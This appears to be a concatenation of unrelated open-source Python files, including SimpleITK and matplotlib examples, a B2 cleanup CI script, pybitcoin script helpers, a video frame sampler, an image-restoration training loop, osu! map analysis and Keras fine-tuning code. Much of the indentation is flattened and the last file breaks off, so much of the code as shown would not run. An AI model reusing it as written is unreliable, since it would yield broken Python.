cursor.execute(self.sql_select + ' where txid_hint = ?', (txid_hint, ))
for row in cursor.fetchall():
(vl, txn) = protocol.Txn.parse(row[2])
if txn.hash == txid:
return Transaction(self, row, txn)
n //= 2
# maybe another process grew us, and we didn't know? Try again.
new_n = self.load_n()
if new_n != self._N:
self._N = new_n
            return self.get(txid, default)
return default
#def __getitem__(self, name):
# 'Get a transaction by its txid.'
#
# txn = self.get(name)
# if txn is not None:
# return txn
# raise KeyError(name)
    # Useful? Should it return a blockchain.transaction.Transaction or protocol.Txn?
#def __iter__(self):
# 'Iterate over every transaction. There is no meaningful order.'
#
# for connection in self._connections.values():
# cursor = connection.cursor()
# cursor.execute(self.sql_select)
# while True:
# rows = cursor.fetchmany()
# if not rows: break
# for row in rows:
# #yield Transaction(self, row)
# (vl, txn) = protocol.Txn.parse(row[2])[1]
# yield txn
|
Examples/Python/ImageCreateAndSet.py | nathantspencer/SimpleElastix | 350 | 12775699 | <reponame>nathantspencer/SimpleElastix
#!/usr/bin/env python
#=========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#=========================================================================
from __future__ import print_function
import SimpleITK as sitk
import os
xImg = sitk.Image( 256, 256, sitk.sitkFloat32 )
yImg = sitk.Image( 256, 256, sitk.sitkFloat32 )
for y in range( 0, xImg.GetSize()[1] ):
for x in range( 0, xImg.GetSize()[0] ):
xImg.SetPixel( x, y, x )
yImg[x, y] = y
sigma = 50
xImg = sitk.Subtract( xImg, xImg.GetSize()[0] / 2 )
yImg = yImg - yImg.GetSize()[1] / 2
gaussianImg = sitk.Exp( -1 * (xImg**2 + yImg**2) / (2.0 * sigma**2) )
if ( not "SITK_NOSHOW" in os.environ ):
sitk.Show( gaussianImg, "Gaussian Blob" )
|
examples/registration/demo.py | mli0603/lietorch | 360 | 12775725 | import sys
sys.path.append('../core')
import argparse
import torch
import cv2
import numpy as np
from viz import sim3_visualization
from lietorch import SO3, SE3, Sim3
from networks.sim3_net import Sim3Net
def normalize_images(images):
images = images[:, :, [2,1,0]]
mean = torch.as_tensor([0.485, 0.456, 0.406], device=images.device)
std = torch.as_tensor([0.229, 0.224, 0.225], device=images.device)
return (images/255.0).sub_(mean[:, None, None]).div_(std[:, None, None])
def load_example(i=0):
""" get demo example """
DEPTH_SCALE = 5.0
if i==0:
image1 = cv2.imread('assets/image1.png')
image2 = cv2.imread('assets/image2.png')
depth1 = np.load('assets/depth1.npy') / DEPTH_SCALE
depth2 = np.load('assets/depth2.npy') / DEPTH_SCALE
elif i==1:
image1 = cv2.imread('assets/image3.png')
image2 = cv2.imread('assets/image4.png')
depth1 = np.load('assets/depth3.npy') / DEPTH_SCALE
depth2 = np.load('assets/depth4.npy') / DEPTH_SCALE
images = np.stack([image1, image2], 0)
images = torch.from_numpy(images).permute(0,3,1,2)
depths = np.stack([depth1, depth2], 0)
depths = torch.from_numpy(depths).float()
intrinsics = np.array([320.0, 320.0, 320.0, 240.0])
intrinsics = np.tile(intrinsics[None], (2,1))
intrinsics = torch.from_numpy(intrinsics).float()
return images[None].cuda(), depths[None].cuda(), intrinsics[None].cuda()
@torch.no_grad()
def demo(model, index=0):
images, depths, intrinsics = load_example(index)
# initial transformation estimate
if args.transformation == 'SE3':
Gs = SE3.Identity(1, 2, device='cuda')
elif args.transformation == 'Sim3':
Gs = Sim3.Identity(1, 2, device='cuda')
depths[:,0] *= 2**(2*torch.rand(1) - 1.0).cuda()
images1 = normalize_images(images)
ests, _ = model(Gs, images1, depths, intrinsics, num_steps=12)
# only care about last transformation
Gs = ests[-1]
T = Gs[:,0] * Gs[:,1].inv()
T = T[0].matrix().double().cpu().numpy()
sim3_visualization(T, images, depths, intrinsics)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
    parser.add_argument('--transformation', default='SE3', help='transformation group to estimate: SE3 or Sim3')
parser.add_argument('--ckpt', help='checkpoint to restore')
args = parser.parse_args()
model = Sim3Net(args)
model.load_state_dict(torch.load(args.ckpt))
model.cuda()
model.eval()
# run two demos
demo(model, 0)
demo(model, 1)
|
ci/delete_old_binaries.py | NoahR02/Odin | 2,690 | 12775751 | import subprocess
import sys
import json
import datetime
import urllib.parse
import sys
def main():
files_by_date = {}
bucket = sys.argv[1]
days_to_keep = int(sys.argv[2])
print(f"Looking for binaries to delete older than {days_to_keep} days")
files_lines = execute_cli(f"b2 ls --long --versions {bucket} nightly").split("\n")
for x in files_lines:
parts = [y for y in x.split(' ') if y]
if parts and parts[0]:
date = datetime.datetime.strptime(parts[2], '%Y-%m-%d').replace(hour=0, minute=0, second=0, microsecond=0)
now = datetime.datetime.utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
delta = now - date
if delta.days > days_to_keep:
print(f'Deleting {parts[5]}')
execute_cli(f'b2 delete-file-version {parts[0]}')
def execute_cli(command):
sb = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
    return sb.stdout.read().decode("utf-8")
if __name__ == '__main__':
sys.exit(main())
|
pybitcoin/transactions/scripts.py | sea212/pybitcoin | 220 | 12775755 | <filename>pybitcoin/transactions/scripts.py
# -*- coding: utf-8 -*-
"""
pybitcoin
~~~~~
:copyright: (c) 2014 by Halfmoon Labs
:license: MIT, see LICENSE for more details.
"""
from .opcodes import *
from .utils import count_bytes
from ..constants import MAX_BYTES_AFTER_OP_RETURN
from ..b58check import b58check_decode, b58check_encode
from binascii import hexlify, unhexlify
from utilitybelt import is_hex
def script_to_hex(script):
""" Parse the string representation of a script and return the hex version.
Example: "OP_DUP OP_HASH160 c629...a6db OP_EQUALVERIFY OP_CHECKSIG"
"""
hex_script = ''
parts = script.split(' ')
for part in parts:
if part[0:3] == 'OP_':
try:
hex_script += '%0.2x' % eval(part)
except:
raise Exception('Invalid opcode: %s' % part)
elif isinstance(part, (int)):
hex_script += '%0.2x' % part
elif is_hex(part):
hex_script += '%0.2x' % count_bytes(part) + part
else:
raise Exception('Invalid script - only opcodes and hex characters allowed.')
return hex_script
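# Illustrative usage sketch (the 5-byte payload below is arbitrary example data; the
# expected output assumes OP_RETURN maps to the standard opcode value 0x6a and that
# count_bytes returns the byte length of the hex payload):
#
#   script_to_hex('OP_RETURN 68656c6c6f')
#   -> '6a0568656c6c6f'  (opcode byte, push-length byte, then the data)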
def make_pay_to_address_script(address):
""" Takes in an address and returns the script
"""
hash160 = hexlify(b58check_decode(address))
script_string = 'OP_DUP OP_HASH160 %s OP_EQUALVERIFY OP_CHECKSIG' % hash160
return script_to_hex(script_string)
def make_op_return_script(data, format='bin'):
""" Takes in raw ascii data to be embedded and returns a script.
"""
if format == 'hex':
assert(is_hex(data))
hex_data = data
elif format == 'bin':
hex_data = hexlify(data)
else:
raise Exception("Format must be either 'hex' or 'bin'")
num_bytes = count_bytes(hex_data)
if num_bytes > MAX_BYTES_AFTER_OP_RETURN:
        raise Exception('Data is %i bytes - must not exceed %i.' % (num_bytes, MAX_BYTES_AFTER_OP_RETURN))
script_string = 'OP_RETURN %s' % hex_data
return script_to_hex(script_string)
|
vectorhub/encoders/video/sampler.py | boba-and-beer/vectorhub | 385 | 12775798 | <gh_stars>100-1000
from math import ceil
import numpy as np
import os
import tempfile
from ...import_utils import *
if is_all_dependency_installed('encoders-video'):
import librosa
import soundfile as sf
from cv2 import cv2
from moviepy.video.io.ffmpeg_reader import ffmpeg_parse_infos
from moviepy.video.io.VideoFileClip import VideoFileClip
class FrameSamplingFilter():
def __init__(self, every=None, hertz=None, top_n=None):
if every is None and hertz is None and top_n is None:
raise ValueError("When initializing the FrameSamplingFilter, "
"one of the 'every', 'hertz', or 'top_n' must "
"be specified.")
self.every = every
self.hertz = hertz
self.top_n = top_n
def get_audio_sampling_rate(self, filename: str):
infos = ffmpeg_parse_infos(filename)
fps = infos.get('audio_fps', 44100)
if fps == 'unknown':
fps = 44100
return fps
def load_clip(self, filename: str):
audio_fps = self.get_audio_sampling_rate(filename)
self.clip = VideoFileClip(filename, audio_fps)
def initialize_video(self, filename: str):
self.filename = filename
self.load_clip(filename)
self.fps = self.clip.fps
self.width = self.clip.w
self.height = self.clip.h
self.frame_index = range(int(ceil(self.fps * self.clip.duration)))
self.duration = self.clip.duration
self.n_frames = len(self.frame_index)
def get_audio_vector(self, new_sampling_rate: int = 16000):
fd, fp = tempfile.mkstemp()
audio = f'{fp}.wav'
self.clip.audio.to_audiofile(audio)
data, sampling_rate = sf.read(audio, dtype='float32')
os.close(fd)
os.remove(audio)
return np.array(librosa.resample(data.T, sampling_rate, new_sampling_rate))
def transform(self, filename: str):
self.initialize_video(filename)
if (self.every is not None):
new_idx = range(self.n_frames)[::self.every]
elif (self.hertz is not None):
interval = self.fps / float(self.hertz)
new_idx = np.arange(0, self.n_frames, interval).astype(int)
new_idx = list(new_idx)
elif self.top_n is not None:
diffs = []
for i, img in enumerate(range(self.n_frames)):
if i == 0:
last = img
continue
pixel_diffs = cv2.sumElems(cv2.absdiff(
self.get_frame(last), self.get_frame(img)))
diffs.append(sum(pixel_diffs))
last = img
new_idx = sorted(range(len(diffs)),
key=lambda i: diffs[i],
reverse=True)[:self.top_n]
result = []
for index in new_idx:
result.append(self.get_frame(index))
return result
def get_frame(self, index: int):
return self.clip.get_frame(index)
def iter_frames(self):
for i, f in enumerate(self.frame_index):
yield self.get_frame(f)
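# Illustrative usage sketch (the file name and parameter values below are placeholders,
# not part of the library API):
#
#   sampler = FrameSamplingFilter(hertz=1)             # roughly one sampled frame per second
#   frames = sampler.transform('example_video.mp4')    # list of sampled frame arrays
#   audio = sampler.get_audio_vector(16000)            # audio track resampled to 16 kHz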
|
cnn_train.py | sg-nm/Operation-wise-attention-network | 102 | 12775864 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.utils.data import DataLoader
import torchvision.transforms as transforms
import torchvision.utils as vutils
from torch.autograd import Variable
from skimage.measure import compare_psnr as ski_psnr
from skimage.measure import compare_ssim as ski_ssim
import os
import csv
import logging
from model import Network
import torch.nn.functional as F
from data_load_own import get_training_set, get_test_set
from data_load_mix import get_dataset_deform
import utils
class CNN_train():
def __init__(self, dataset_name, imgSize=63, batchsize=32):
self.imgSize = imgSize
self.batchsize = batchsize
self.dataset_name = dataset_name
# load dataset
if dataset_name == 'mix' or dataset_name == 'yourdata':
if dataset_name == 'mix':
self.num_work = 8
train_dir = '/dataset/train/'
val_dir = '/dataset/val/'
test_dir = '/dataset/test/'
train_set = get_dataset_deform(train_dir, val_dir, test_dir, 0)
val_set = get_dataset_deform(train_dir, val_dir, test_dir, 1)
# test_set = get_dataset_deform(train_dir, val_dir, test_dir, 2)
self.dataloader = DataLoader(dataset=train_set, num_workers=self.num_work, batch_size=self.batchsize, shuffle=True, pin_memory=True)
self.val_loader = DataLoader(dataset=val_set, num_workers=self.num_work, batch_size=1, shuffle=False, pin_memory=False)
# self.test_dataloader = DataLoader(dataset=test_set, num_workers=self.num_work, batch_size=1, shuffle=False, pin_memory=False)
elif dataset_name == 'yourdata':
self.num_work = 8
# Specify the path of your data
train_input_dir = '/dataset/yourdata_train/input/'
train_target_dir = '/dataset/yourdata_train/target/'
test_input_dir = '/dataset/yourdata_test/input/'
test_target_dir = '/dataset/yourdata_test/target/'
train_set = get_training_set(train_input_dir, train_target_dir, True)
test_set = get_training_set(test_input_dir, test_target_dir, False)
self.dataloader = DataLoader(dataset=train_set, num_workers=self.num_work, batch_size=self.batchsize, shuffle=True, drop_last=True)
self.test_dataloader = DataLoader(dataset=test_set, num_workers=self.num_work, batch_size=1, shuffle=False)
else:
print('\tInvalid input dataset name at CNN_train()')
exit(1)
def __call__(self, cgp, gpuID, epoch_num=150, gpu_num=1):
print('GPUID :', gpuID)
print('epoch_num:', epoch_num)
# define model
torch.manual_seed(2018)
torch.cuda.manual_seed(2018)
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.enabled = True
L1_loss = nn.L1Loss()
L1_loss = L1_loss.cuda(gpuID)
model = Network(16, 10, L1_loss, gpuID=gpuID)
if gpu_num > 1:
device_ids = [i for i in range(gpu_num)]
model = torch.nn.DataParallel(model, device_ids=device_ids)
model = model.cuda(gpuID)
logging.info("param size = %fMB", utils.count_parameters_in_MB(model))
print('Param:', utils.count_parameters_in_MB(model))
optimizer = optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999))
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=epoch_num)
test_interval = 5
# for output images
if not os.path.exists('./results'):
os.makedirs('./results/Inputs')
os.makedirs('./results/Outputs')
os.makedirs('./results/Targets')
# Train loop
for epoch in range(1, epoch_num+1):
scheduler.step()
start_time = time.time()
print('epoch', epoch)
train_loss = 0
for module in model.children():
module.train(True)
for ite, (input, target) in enumerate(self.dataloader):
lr_patch = Variable(input, requires_grad=False).cuda(gpuID)
hr_patch = Variable(target, requires_grad=False).cuda(gpuID)
optimizer.zero_grad()
output = model(lr_patch)
l1_loss = L1_loss(output, hr_patch)
l1_loss.backward()
optimizer.step()
train_loss += l1_loss.item()
if ite % 500 == 0:
vutils.save_image(lr_patch.data, './input_sample%d.png' % gpuID, normalize=False)
vutils.save_image(hr_patch.data, './target_sample%d.png' % gpuID, normalize=False)
vutils.save_image(output.data, './output_sample%d.png' % gpuID, normalize=False)
print('Train set : Average loss: {:.4f}'.format(train_loss))
print('time ', time.time()-start_time)
# check val/test performance
if epoch % test_interval == 0:
with torch.no_grad():
print('------------------------')
for module in model.children():
module.train(False)
test_psnr = 0
test_ssim = 0
eps = 1e-10
test_ite = 0
                    for i, (input, target) in enumerate(self.val_loader):
lr_patch = Variable(input, requires_grad=False).cuda(gpuID)
hr_patch = Variable(target, requires_grad=False).cuda(gpuID)
output = model(lr_patch)
# save images
vutils.save_image(output.data, './results/Outputs/%05d.png' % (int(i)), padding=0, normalize=False)
vutils.save_image(lr_patch.data, './results/Inputs/%05d.png' % (int(i)), padding=0, normalize=False)
vutils.save_image(hr_patch.data, './results/Targets/%05d.png' % (int(i)), padding=0, normalize=False)
# Calculation of SSIM and PSNR values
output = output.data.cpu().numpy()[0]
output[output>1] = 1
output[output<0] = 0
output = output.transpose((1,2,0))
hr_patch = hr_patch.data.cpu().numpy()[0]
hr_patch[hr_patch>1] = 1
hr_patch[hr_patch<0] = 0
hr_patch = hr_patch.transpose((1,2,0))
# SSIM
test_ssim+= ski_ssim(output, hr_patch, data_range=1, multichannel=True)
# PSNR
imdf = (output - hr_patch) ** 2
mse = np.mean(imdf) + eps
test_psnr+= 10 * math.log10(1.0/mse)
test_ite += 1
test_psnr /= (test_ite)
test_ssim /= (test_ite)
print('Valid PSNR: {:.4f}'.format(test_psnr))
print('Valid SSIM: {:.4f}'.format(test_ssim))
f = open('PSNR.txt', 'a')
writer = csv.writer(f, lineterminator='\n')
writer.writerow([epoch, test_psnr, test_ssim])
f.close()
print('------------------------')
torch.save(model.state_dict(), './model_%d.pth' % int(epoch))
return train_loss
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_05_10/models/_resource_management_client_enums.py | rsdoherty/azure-sdk-for-python | 2,728 | 12775874 | <reponame>rsdoherty/azure-sdk-for-python<filename>sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_05_10/models/_resource_management_client_enums.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
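# Illustrative behaviour sketch (not part of the generated code): with this metaclass,
# DeploymentMode['incremental'] and DeploymentMode.incremental both resolve to the
# DeploymentMode.INCREMENTAL member, whose value is "Incremental".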
class DeploymentMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The mode that is used to deploy resources. This value can be either Incremental or Complete. In
Incremental mode, resources are deployed without deleting existing resources that are not
included in the template. In Complete mode, resources are deployed and existing resources in
the resource group that are not included in the template are deleted. Be careful when using
Complete mode as you may unintentionally delete resources.
"""
INCREMENTAL = "Incremental"
COMPLETE = "Complete"
class OnErrorDeploymentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The deployment on error behavior type. Possible values are LastSuccessful and
SpecificDeployment.
"""
LAST_SUCCESSFUL = "LastSuccessful"
SPECIFIC_DEPLOYMENT = "SpecificDeployment"
class ResourceIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The identity type.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
USER_ASSIGNED = "UserAssigned"
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
NONE = "None"
|
wouso/games/challenge/urls.py | AlexandruGhergut/wouso | 117 | 12775921 | <gh_stars>100-1000
from django.conf.urls.defaults import *
urlpatterns = patterns('wouso.games.challenge.views',
url(r'^$', 'index', name='challenge_index_view'),
url(r'^(?P<id>\d+)/$', 'challenge', name='view_challenge'),
url(r'^launch/(?P<to_id>\d+)/$', 'launch', name='challenge_launch'),
url(r'^refuse/(?P<id>\d+)/$', 'refuse', name='challenge_refuse'),
url(r'^accept/(?P<id>\d+)/$', 'accept', name='challenge_accept'),
url(r'^cancel/(?P<id>\d+)/$', 'cancel', name='challenge_cancel'),
url(r'^setplayed/(?P<id>\d+)/$', 'setplayed', name='setplayed'),
url(r'^use_artifact/$', 'use_one_more', name='challenge_onemore'),
url(r'^history/(?P<playerid>\d+)/$', 'history', name='challenge_history'),
url(r'^playerchallenge/$', 'challenge_player', name='challenge_player'),
url(r'^randomchallenge/$', 'challenge_random', name='challenge_random'),
url(r'^stats/$', 'challenge_stats', name='challenge_stats'),
url(r'^stats/player=(?P<player_id>\d+)/$', 'challenge_stats', name='challenge_stats'),
url(r'^stats/target=(?P<target_id>\d+)/', 'detailed_challenge_stats',
name='detailed_challenge_stats'),
url(r'^stats/player=(?P<player_id>\d+)/target=(?P<target_id>\d+)/', 'detailed_challenge_stats',
name='detailed_challenge_stats'),
)
|
extraPackages/matplotlib-3.0.3/examples/lines_bars_and_markers/vline_hline_demo.py | dolboBobo/python3_ios | 130 | 12775943 | <reponame>dolboBobo/python3_ios
"""
=================
hlines and vlines
=================
This example showcases the functions hlines and vlines.
"""
import matplotlib.pyplot as plt
import numpy as np
t = np.arange(0.0, 5.0, 0.1)
s = np.exp(-t) + np.sin(2 * np.pi * t) + 1
nse = np.random.normal(0.0, 0.3, t.shape) * s
fig, (vax, hax) = plt.subplots(1, 2, figsize=(12, 6))
vax.plot(t, s + nse, '^')
vax.vlines(t, [0], s)
# By using ``transform=vax.get_xaxis_transform()`` the y coordinates are scaled
# such that 0 maps to the bottom of the axes and 1 to the top.
vax.vlines([1, 2], 0, 1, transform=vax.get_xaxis_transform(), colors='r')
vax.set_xlabel('time (s)')
vax.set_title('Vertical lines demo')
hax.plot(s + nse, t, '^')
hax.hlines(t, [0], s, lw=2)
hax.set_xlabel('time (s)')
hax.set_title('Horizontal lines demo')
plt.show()
|
v7.0/map_analyze.py | jsstwright/osumapper | 296 | 12775982 | # -*- coding: utf-8 -*-
#
# JSON osu! map analysis
#
import numpy as np;
def get_map_timing_array(map_json, length=-1, divisor=4):
if length == -1:
length = map_json["obj"][-1]["time"] + 1000; # it has an extra time interval after the last note
if map_json["obj"][-1]["type"] & 8: # spinner end
length = map_json["obj"][-1]["spinnerEndTime"] + 1000;
uts_a = map_json["timing"]["uts"];
out = [];
for i, uts in enumerate(uts_a):
begin_time = uts["beginTime"];
mspb = uts["tickLength"];
if i < len(uts_a)-1:
end_time = uts_a[i+1]["beginTime"];
else:
end_time = length;
arr = np.floor(np.arange(begin_time, end_time, mspb / divisor));
out = out + list(map(lambda f: int(f), arr));
return out;
def get_tick_len(map_json, tick):
uts_a = map_json["timing"]["uts"];
if tick < uts_a[0]["beginTime"]:
return uts_a[0]["tickLength"];
_out = 600;
for uts in uts_a:
if tick >= uts["beginTime"]:
_out = uts["tickLength"];
else:
return _out;
return _out;
def get_slider_len(map_json, tick):
ts_a = map_json["timing"]["ts"];
if tick < ts_a[0]["beginTime"]:
return ts_a[0]["sliderLength"];
_out = 100;
for ts in ts_a:
if tick >= ts["beginTime"]:
_out = ts["sliderLength"];
else:
return _out;
return _out;
def get_slider_len_ts(ts_a, tick):
if tick < ts_a[0]["beginTime"]:
return ts_a[0]["sliderLength"];
_out = 100;
for ts in ts_a:
if tick >= ts["beginTime"]:
_out = ts["sliderLength"];
else:
return _out;
return _out;
def get_end_time(note):
if note["type"] & 8:
return note["spinnerEndTime"];
elif note["type"] & 2:
return note["sliderData"]["endTime"];
#elif note["type"] & 128:
# return note["holdEndTime"];
else:
return note["time"];
# edited from uts to ts
def get_all_ticks_and_lengths_from_ts(uts_array, ts_array, end_time, divisor=4):
# Returns array of all timestamps, ticklens and sliderlens.
endtimes = ([uts["beginTime"] for uts in uts_array] + [end_time])[1:];
timestamps = [np.arange(uts["beginTime"], endtimes[i], uts["tickLength"] / divisor) for i, uts in enumerate(uts_array)];
ticks_from_uts = [list(range(len(timestamp_group))) for timestamp_group in timestamps];
tick_len = [[uts["tickLength"]] * len(np.arange(uts["beginTime"], endtimes[i], uts["tickLength"] / divisor)) for i, uts in enumerate(uts_array)];
# slider_len = [[ts["sliderLength"]] * len(np.arange(ts["beginTime"], endtimes[i], ts["tickLength"] / divisor)) for i, ts in enumerate(ts_array)];
slider_len = [get_slider_len_ts(ts_array, timestamp) for timestamp in np.concatenate(timestamps)];
return np.concatenate(ticks_from_uts), np.round(np.concatenate(timestamps)).astype(int), np.concatenate(tick_len), np.array(slider_len);
def get_end_point(note):
if note["type"] & 8:
return np.array([256, 192]);
elif note["type"] & 2:
return np.array(note["sliderData"]["endpoint"]);
else:
return np.array([note["x"], note["y"]]);
def get_input_vector(note, prev_note):
if note["type"] & 8:
return None;
#elif note["type"] & 2:
# return np.array(note["sliderData"]["dIn"]);
else:
vec = np.array([note["x"], note["y"]]) - get_end_point(prev_note);
return vec / max(0.001, np.sqrt(vec.dot(vec)));
def get_output_vector(note, prev_note):
if note["type"] & 8:
return None;
elif note["type"] & 2:
return np.array(note["sliderData"]["dOut"]);
else:
vec = np.array([note["x"], note["y"]]) - get_end_point(prev_note);
return vec / max(0.001, np.sqrt(vec.dot(vec)));
def get_momentum(note, prev_note, slider_len):
"""
momentum = distance snap (distance / slider length).
    for sliders, takes the smaller of the distances measured from the slider end or the slider start to the next note.
"""
v1 = np.array([note["x"], note["y"]]);
v0 = get_end_point(prev_note);
v = v1 - v0;
if note["time"] - get_end_time(prev_note) == 0 or note["time"] - prev_note["time"] == 0:
        # it ends at the same time as the previous note: either a bugged slider end or a double note
return 0;
end_type_momentum = np.sqrt(v.dot(v)) / (note["time"] - get_end_time(prev_note)) / slider_len;
# Since slider jumps in maps cause parameters to be learned too high
# we try to deal with slider leniency by using the beginning of slider
v2 = np.array([prev_note["x"], prev_note["y"]]);
v3 = v1 - v2;
start_type_momentum = np.sqrt(v3.dot(v3)) / (note["time"] - prev_note["time"]) / slider_len;
return np.min([end_type_momentum, start_type_momentum]);
def is_uts_begin(map_json, tick):
uts_a = map_json["timing"]["uts"];
begin_times = [uts["beginTime"] for uts in uts_a];
for t in begin_times:
if tick > t - 1 and tick < t + 5:
return True
return False
def get_map_notes(map_json, **kwargs):
"""
Reads JSON map data and creates a list for every tick
Returns:
data = list of data array: [TICK, TIME, NOTE, NOTE_TYPE, SLIDING, SPINNING, MOMENTUM, Ex1, Ex2, Ex3]
flow_data = list of data array: [i, tick, note_type, x, y, vec_in_x, vec_in_y, vec_out_x, vec_out_y, end_x, end_y]
Ex1, Ex2, Ex3 = tickLength/500, BPM/120, sliderLength/150
"""
length = kwargs.get("length", -1);
divisor = kwargs.get("divisor", 4);
tick_times = get_map_timing_array(map_json, length = length, divisor = divisor);
objs = map_json["obj"];
obj_times = list(map(lambda obj: obj["time"], objs));
# 1 for circle, 2 for slider, 3 for spinner
def get_note_type(obj):
if not obj:
return 0;
if obj["type"] & 2:
return 2;
elif obj["type"] & 8:
return 3;
return 1;
po = 0;
note_max_wait_time = kwargs.get("note_max_wait_time", 1000);
start_time = obj_times[0] - note_max_wait_time;
last_obj_time = start_time;
sliding = 0;
slider_end_time = 0;
spinning = 0;
spinner_end_time = 0;
data = [];
flow_data = [];
# constant multipliers and subtractions
tlen_mp = 1/500;
tlen_s = 1;
bpm_mp = 1/120;
bpm_s = 1;
slen_mp = 1/150;
slen_s = 1;
# tick count from start of uninherited timing section
uts_i = 0;
# tick is timestamp here
for i, tick in enumerate(tick_times):
if is_uts_begin(map_json, tick):
uts_i = 0;
else:
uts_i += 1;
# Attach extra vars at the end of each note data row
tlen = get_tick_len(map_json, tick);
bpm = 60000 / tlen;
slen = get_slider_len(map_json, tick);
ex1 = tlen * tlen_mp - tlen_s;
ex2 = bpm * bpm_mp - bpm_s;
ex3 = slen * slen_mp - slen_s;
while obj_times[po] < tick - 5 and po < len(obj_times) - 1:
po += 1;
if obj_times[po] >= tick - 5 and obj_times[po] <= tick + 5: # found note
last_obj_time = tick;
note_type = get_note_type(objs[po]);
# calculate momentum
if po >= 1:
momentum = get_momentum(objs[po], objs[po-1], slen/tlen);
else:
momentum = 0;
# flow data
if po >= 1:
input_vector = get_input_vector(objs[po], objs[po-1]);
output_vector = get_output_vector(objs[po], objs[po-1]);
else:
input_vector = [0, 0];
output_vector = [0, 0];
if input_vector is None or input_vector[0] is None or input_vector[1] is None:
input_vector = [0, 0];
if output_vector is None or output_vector[0] is None or output_vector[1] is None:
output_vector = [0, 0];
# end point
endpoint = get_end_point(objs[po]);
flow_data.append([uts_i, tick, note_type, objs[po]["x"], objs[po]["y"], input_vector[0], input_vector[1], output_vector[0], output_vector[1], endpoint[0], endpoint[1]]);
# put data
if note_type == 1:
spinning = 0;
sliding = 0;
elif note_type == 2:
sliding = 1;
slider_end_time = objs[po]["sliderData"]["endTime"];
elif note_type == 3:
spinning = 1;
spinner_end_time = objs[po]["spinnerEndTime"];
# because the spinner sometimes get over 3 secs
last_obj_time = spinner_end_time;
# TICK, TIME, NOTE, NOTE_TYPE, SLIDING, SPINNING, MOMENTUM, Ex1, Ex2, Ex3
data.append([uts_i, tick, 1, note_type, sliding, spinning, momentum, ex1, ex2, ex3]);
elif spinning == 1:
if tick >= spinner_end_time - 5:
spinning = 0;
data.append([uts_i, tick, 1, 5, 0, 0, 0, ex1, ex2, ex3]);
else:
data.append([uts_i, tick, 0, 0, 0, 1, 0, ex1, ex2, ex3]);
elif sliding == 1:
if tick >= slider_end_time - 5:
sliding = 0;
data.append([uts_i, tick, 1, 4, 0, 0, 0, ex1, ex2, ex3]);
else:
data.append([uts_i, tick, 0, 0, 1, 0, 0, ex1, ex2, ex3]);
else: # not found
if tick - last_obj_time < note_max_wait_time and tick >= start_time:
data.append([uts_i, tick, 0, 0, 0, 0, 0, ex1, ex2, ex3]);
return data, flow_data; |
extra/test_multi.py | ragnariock/DeepFashion | 255 | 12775984 | ### IMPORTS
from __future__ import print_function
import os
import fnmatch
import numpy as np
import skimage.data
import cv2
import sys
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from PIL import Image
from keras import applications
from keras.preprocessing.image import ImageDataGenerator
from keras import optimizers
from keras.optimizers import RMSprop, Adagrad
from keras.models import Sequential, Model
from keras.layers import Dropout, Flatten, Dense, Input
from keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, EarlyStopping
import logging
FORMAT = "[%(lineno)4s : %(funcName)-30s ] %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from selective_search import selective_search_bbox
### GLOBALS
# dimensions of our images.
# img_width = 150
# img_height = 150
img_width = 224
img_height = 224
# dataset_path = 'dataset_dogs_cats'
dataset_path = 'dataset'
dataset_train_path=os.path.join(dataset_path, 'train')
dataset_val_path=os.path.join(dataset_path, 'validation')
dataset_test_path=os.path.join(dataset_path, 'test')
# path to the model weights files.
weights_path = 'weights/vgg16_weights.h5'
#top_model_weights_path = 'output/bottleneck_fc_model.h5'
#top_model_weights_path = 'output_6_categ/best-weights-015-0.5636-0.7923.hdf5'
#finetune_model_weights_path = 'output/finetune_bottleneck_fc_model.h5'
#finetune_model_weights_path = 'output_6_categ/best-weights-finetune-000-0.2325-0.9062.hdf5'
#finetune_model_weights_path = 'output_6_categ_crop/best-weights-finetune-008-0.3453-0.8774.hdf5'
#finetune_model_weights_path = 'output/best-weights-finetune-000-1.5646-0.5217.hdf5'
#finetune_model_weights_path = 'results_36categ/best-weights-finetune-000-1.5646-0.5217.hdf5'
finetune_model_weights_path = 'output/finetune_bottleneck_fc_model.h5'
#epochs = 50
epochs = 5
#batch_size = 16
#batch_size = 32
batch_size = 1
# Count no. of images(.jpg) in a directory
def get_images_count_recursive(path):
matches = []
logging.debug('path {}'.format(path))
